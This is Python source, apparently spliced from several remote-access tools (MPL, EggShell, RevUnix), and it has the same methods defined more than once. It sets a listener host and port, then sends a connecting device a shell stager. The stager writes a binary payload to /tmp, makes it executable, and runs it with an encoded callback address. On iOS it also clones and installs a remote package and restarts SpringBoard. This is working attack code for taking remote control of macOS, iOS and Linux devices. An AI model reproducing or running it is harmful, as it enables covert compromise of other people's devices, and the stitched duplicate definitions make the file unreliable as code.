def set_host_port(self):
try:
lhost = h.getip()
lport = None
choice = raw_input(h.info_general_raw("Local Host: "))
if choice != "":
lhost = choice
while True:
lport = raw_input(h.info_general_raw("Local Port: "))
if not lport:
lport = 4444
try:
lport = int(lport)
except ValueError:
h.info_error("Invalid port, please enter a valid integer.")
continue
if lport < 1024:
h.info_error("Invalid port, please enter a value >= 1024.")
continue
break
h.info_general("Using " + lhost + ":" + str(lport) + "...")
self.host = socket.gethostbyname(lhost)
self.port = lport
return True
except KeyboardInterrupt:
return
def disconnect(self, verbose):
self.conn.close()
if verbose:
h.info_general("Closing session...")
time.sleep(0.5)
if self.server.multihandler.is_running:
del self.server.multihandler.sessions_id[self.id]
del self.server.multihandler.sessions_uid[self.uid]
def craft_payload(self, device_arch):
# TODO: Detect uid before we send executable
if not self.host:
raise ValueError('Server host not set')
if not self.port:
raise ValueError('Server port not set')
payload_parameter = h.b64(
json.dumps({
"ip": self.host,
"port": self.port,
"debug": self.debug
}))
if device_arch in self.macos_architectures:
self.verbose_print("Detected macOS")
f = open("resources/mplmacos", "rb")
payload = f.read()
f.close()
#save to tmp,
instructions = \
"cat >/private/tmp/tmpmpl;"+\
"chmod 777 /private/tmp/tmpmpl;"+\
"mv /private/tmp/tmpmpl /private/tmp/mpl;"+\
"/private/tmp/mpl "+payload_parameter+" 2>/dev/null &\n"
return (instructions, payload)
elif device_arch in self.ios_architectures:
self.verbose_print("Detected iOS")
f = open("resources/mplios", "rb")
payload = f.read()
f.close()
instructions = \
"cat >/tmp/tmpmpl;"+\
"chmod 777 /tmp/tmpmpl;"+\
"mv /tmp/tmpmpl /.mpl;"+\
"rm -r mouse;"+\
"git clone https://github.com/entynetproject/mouse.git;"+\
"cd mouse/substrate && chmod +x install.sh && ./install.sh --ignore-package && killall SpringBoard;"+\
"/.mpl "+payload_parameter+" 2>/dev/null &\n"
return (instructions, payload)
else:
if device_arch == "Linux":
self.verbose_print("Detected Linux")
elif "GET / HTTP/1.1" in device_arch:
raise ValueError(
"MPL does not exploit safari, it is a payload loader.")
else:
h.info_general("Device unrecognized, trying python payload...")
f = open("resources/mpl.py", "rb")
payload = f.read()
f.close()
instructions = \
"cat >/tmp/mpl.py;"+\
"chmod 777 /var/tmp/mpl.py;"+\
"python /tmp/mpl.py "+payload_parameter+" &\n"
return (instructions, payload)
def craft_payload(self, device_arch):
# TODO: Detect uid before we send executable
if not self.host:
raise ValueError('Server host not set')
if not self.port:
raise ValueError('Server port not set')
payload_parameter = h.b64(
json.dumps({
"ip": self.host,
"port": self.port,
"debug": self.debug
}))
if device_arch in self.macos_architectures:
self.verbose_print("Detected macOS")
f = open("resources/esplmacos", "rb")
payload = f.read()
f.close()
#save to tmp,
instructions = \
"cat >/private/tmp/tmpespl;"+\
"chmod 777 /private/tmp/tmpespl;"+\
"mv /private/tmp/tmpespl /private/tmp/espl;"+\
"/private/tmp/espl "+payload_parameter+" 2>/dev/null &\n"
return (instructions, payload)
elif device_arch in self.ios_architectures:
self.verbose_print("Detected iOS")
f = open("resources/esplios", "rb")
payload = f.read()
f.close()
instructions = \
"cat >/tmp/tmpespl;"+\
"chmod 777 /tmp/tmpespl;"+\
"mv /tmp/tmpespl /.espl;"+\
"/.espl "+payload_parameter+" 2>/dev/null &\n"
return (instructions, payload)
else:
if device_arch == "Linux":
self.verbose_print("Detected Linux")
elif "GET / HTTP/1.1" in device_arch:
raise ValueError(
"EggShell does not exploit safari, it is a payload creation tool.\nPlease look at the README.md file"
)
else:
h.info_general("Device unrecognized, trying python payload")
f = open("resources/espl.py", "rb")
payload = f.read()
f.close()
instructions = \
"cat >/tmp/espl.py;"+\
"chmod 777 /var/tmp/espl.py;"+\
"python /tmp/espl.py "+payload_parameter+" &\n"
return (instructions, payload)
def set_host_port(self):
try:
lhost = h.getip()
lport = None
choice = raw_input(
h.info_general_raw("SET LHOST (Leave blank for " + lhost +
")>"))
if choice != "":
lhost = choice
h.info_general("LHOST = " + lhost)
while True:
lport = raw_input(
h.info_general_raw("SET LPORT (Leave blank for 4444)>"))
if not lport:
lport = 4444
try:
lport = int(lport)
except ValueError:
h.info_general(
"invalid port, please enter a valid integer")
continue
if lport < 1024:
h.info_general(
"invalid port, please enter a value >= 1024")
continue
break
h.info_general("LPORT = " + str(lport))
self.host = socket.gethostbyname(lhost)
self.port = lport
return True
except KeyboardInterrupt:
return
def set_host_port(self):
try:
lhost = h.getip()
lport = None
choice = raw_input(
h.info_general_raw("Set Listening Host (Leave blank for " +
lhost + ")>"))
if choice != "":
lhost = choice
h.info_general("LHOST = " + lhost)
while True:
lport = raw_input(
h.info_general_raw(
"Set Listening Port (Leave blank for 1337)>"))
if not lport:
lport = 1337
try:
lport = int(lport)
except ValueError:
h.info_general(
"Invalid Port. Please Enter A Valid Integer Value.")
continue
if lport < 1024:
h.info_general(
"Invalid Port. Please Enter A Port With Value >= 1024")
continue
break
h.info_general("LPORT = " + str(lport))
self.host = socket.gethostbyname(lhost)
self.port = lport
return True
except KeyboardInterrupt:
return
def craft_payload(self, device_arch):
if not self.host:
raise ValueError(
'Server Host IP Not Set. Please Set A Valid Host IP.')
if not self.port:
raise ValueError(
'Server Port Number Not Set. Please Set A Valid Port Number.')
payload_parameter = h.b64(
json.dumps({
"ip": self.host,
"port": self.port,
"debug": 1
}))
if device_arch in self.macos_architectures:
if self.is_multi == False:
h.info_general("Detected MacOS!")
f = open("resources/ruplmacos", "rb")
payload = f.read()
f.close()
instructions = \
"cat >/private/tmp/tmprupl;"+\
"chmod 777 /private/tmp/tmprupl;"+\
"mv /private/tmp/tmprupl /private/tmp/rupl;"+\
"/private/tmp/rupl "+payload_parameter+" 2>/dev/null &\n"
return (instructions, payload)
elif device_arch in self.ios_architectures:
if self.is_multi == False:
h.info_general("Detected iOS!")
f = open("resources/ruplios", "rb")
payload = f.read()
f.close()
instructions = \
"cat >/tmp/tmprupl;"+\
"chmod 777 /tmp/tmprupl;"+\
"mv /tmp/tmprupl /tmp/rupl;"+\
"/tmp/rupl "+payload_parameter+" 2>/dev/null &\n"
return (instructions, payload)
else:
if self.is_multi == False:
if device_arch == "Linux":
h.info_general("Detected Linux")
elif "GET / HTTP/1.1" in device_arch:
raise ValueError(
"RevUnix does not exploit Safari Browser. RevUnix is a payload creation tool.\n Please look at the README.md file"
)
else:
h.info_general(
"Device Unrecognized... \nTrying Python Payload...")
f = open("resources/rupl.py", "rb")
payload = f.read()
f.close()
instructions = \
"cat >/tmp/rupl.py;"+\
"chmod 777 /var/tmp/rupl.py;"+\
"python /tmp/rupl.py "+payload_parameter+" &\n"
return (instructions, payload)
def listen_for_stager(self):
identification_shell_command = 'com=$(uname -p); if [ $com != "unknown" ]; then echo $com; else uname; fi\n'
s = socket.socket()
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind(('0.0.0.0', self.port))
s.listen(1)
if self.is_multi == False:
h.info_general("Listening On Port --> " + str(self.port) + ".....")
try:
conn, addr = s.accept()
except KeyboardInterrupt:
s.close()
return
hostAddress = addr[0]
if self.is_multi == False:
h.info_general("Establishing Connection To " + hostAddress)
conn.send(identification_shell_command)
device_arch = conn.recv(128).strip()
if not device_arch:
return
try:
bash_stager, executable = self.craft_payload(device_arch)
except Exception as e:
h.info_error(str(e))
raw_input("Please Press Enter To Continue Further!")
return
if self.is_multi == False:
h.info_general("Sending Payload...")
conn.send(bash_stager)
conn.send(executable)
conn.close()
if self.is_multi == False:
h.info_general("Establishing Secure Connection...")
try:
return self.listen_for_executable_payload(s)
except ssl.SSLError as e:
h.info_error("SSL error: " + str(e))
return
except Exception as e:
h.info_error("Error: " + str(e))
return
def verbose_print(self, text):
if self.is_multi == False:
h.info_general(text)
